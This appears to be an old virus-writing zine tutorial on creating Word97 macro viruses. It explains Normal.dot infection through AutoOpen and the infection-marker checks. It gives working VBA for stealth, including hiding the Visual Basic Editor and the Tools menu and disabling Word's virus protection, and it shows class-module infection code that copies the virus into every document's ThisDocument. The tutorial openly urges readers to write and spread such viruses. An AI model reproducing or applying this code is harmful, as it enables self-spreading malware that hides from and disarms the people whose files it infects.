You don't need to be known in the VB Syntax
to understand this mag!
But it would be good if you look from time to time into the help files!
How a macro virus works:
What's a macro virus
How you can find a virus
The Word97 virus
Ok, I know how to make a simple virus, but what's about the advanced virii?
Now take a look into the VBA help, and look for "For/Next loops" and
"If-Then"
The Word97 class virii:
for problems: Lord_Arz@gmx.net
meet able in the undernet #vir
A macro virus is a word basic script (Word97 viriis are written in Visual Basic)
wich copies itself to the Normal.dot.
The Normal.dot will be started if you open a document. If the virus is on the
Normal.dot, it copies itself to the document.
Let's have a look to the ASCII picture bellow:
INFECTED DOCUMENT-------(virus)---------->NORMAL.DOT the Normal.dot is now infected.
INFECTED NORMAL.DOT-----(virus)---------->DOCUMENT the Document is infected
The Basic Language is easy to learn, if you look at the Assemble language. But with Assembler you can do much more, than with Basic! Of course there are polymorph and stealth macro virii, but they are easy to dedect, because the code is very visible in the Normal.dot. In Word 97 it was very easy to encrypt macro virii, but in Word97 it is more or less impossible or senseless, because you have to leave a part of the macro unencrypted.
I thougt it's good to know, how to find a macro virus, 'coz then you know where you have to be carefull if you write one.
The most virii use stealth techniques against the user, that means, you can't see the code. The remove the ToolsMacro from the command bar, or have a better stealth function. Well, because this is a Word97 virii writing tutorial, I'll list, how to dedect Word97 virii.
The virus removes the locks Tools Macro and/or the Visual Basic Editor:
Open the Normal.dot with a hex editor and rename all what's like that:
M O D U L E 1 . T O O L S M A C R O
M O D U L E 1 . V I E W V B C O D E
another good trick is to export all macros from the Normal.dot to a file. If you want to know more about, read on!
Word97 bases primaly on macros. You can change near to everything, if you know what for a macro is used. For example, you want to add make call a message, on every start of Word:
click on Tools - Macros - Visual Basic Editor
at the project browser click with the right mouse button on Projects(Normal) and select add module.
dubble click at the modul. You'll see a text area at the left part of the screen.
type the following:
Sub AutoOpen()
MsgBox "Hello"
End Sub
I won't discribe this simple code... you can read it in the help! But you see
AutoOpen will be executed on every start of the Normal.dot. Of course there
are many ways to call a macro on every start. A virus inserts an infection code
instead of the message box.
Here is only a short description:
modul name: FirstMacVirVSource is the file, where the virus is.
VDestination is the file, wich the virus has to infect.
I use UCase, to catch errors, wich might happen, if the letter cases are different
e.g the normal templates name is "Normal.Dot"
instead "Normal.dot".
Now copy the macro FirstMacVir from VSource to VDestination.
That's a short and very simple virus.
Note! If you want to bee good, you have to try out, and explore!
We wrote in the last level, a very simple virus, it would work, but not very well. The virus would spead and spread and the files would grow on and on... to avoid this you've to check. Check routines depends on the virus!! If you write a modul virus, with a fix name, you can identify the virus, by the modul name. So did the first virii, wich were around, and so we will do it too in this level:
Modulname: Virus2
Sub AutoOpen()The first line bellow Sub AoutoOpen() disables the Break (Ctrl+Break), that
means, the usere isn't able to interrupt the virus by Ctrl-Break.
The second line disables the virus prodection of Word97. (I hope you all know
what I mean)
now you have a prodected virus that checks for infections
You should add stealth techniques to everyone of your virii!!
There are the simple stealth techniques and the special stealth techniques,
wich requies a special knowlege! Stealth ain't stealth in every case! Take a
look at the SuperIIS and then take a look at another virus, SuperIIS has a very
advanced stealth technique, but the code is (with the infection engine, wich
is also special) more than a few hundred lines long!!!!
But let's start with the basic stealth:
Create a new modul and add the following lines:
Sub ViewVBCode()
End Sub
Now try at the Document, to click on tools-macros-VisualBasicEditor.
Huh?, it hasn't worked?? This is because of the macro. Go to the macro, by tools-macros-create.
At the dialog box click on your new macro and click on the edit button.
The macro, that you must have to lock this could be:
Sub ToolsMacros()
End Sub
Of course there are many of such simple tricks, but these were the mostly used. Take a look at other modul virii and study them.
To kill the whole Tool menu type the following line at your virus:
Application.CommandBars("Tools").Enabled=False
To kill the Tools Macros only:
Application.CommandBars("Tools").Controls(12).Enabled=False 'you can use Visible=False too, to hide this option!!
The class virus infects class moduls of a Word document. Classes are invisible
in the 'Tools-
macros' dialoge. I preferm to write class virii, wich infect the class
'ThisDocument'. This is
because this class is in EVERY document. I'll explain here how to write
such virii. Notice, that
this virii have a different infection method!
To get my own possition I use:
MyPos=ThisDocument.Name
The class of the ThisDocument, I want to infect, depends on MyPos.
Let's say MyPos="Normal.dot" so I take:
set target=ActiveDocument.VBProject.VBComponents(1).CodeModule
The code for the infection:
With NormalTemplate.VBProject.VBComponents(1).CodeModule
VirusCode= .Lines(1, .CountOfLines)
End With
With target
.DeleteLines 1, .CountOfLines
.InsertLines 1, VirusCode
End With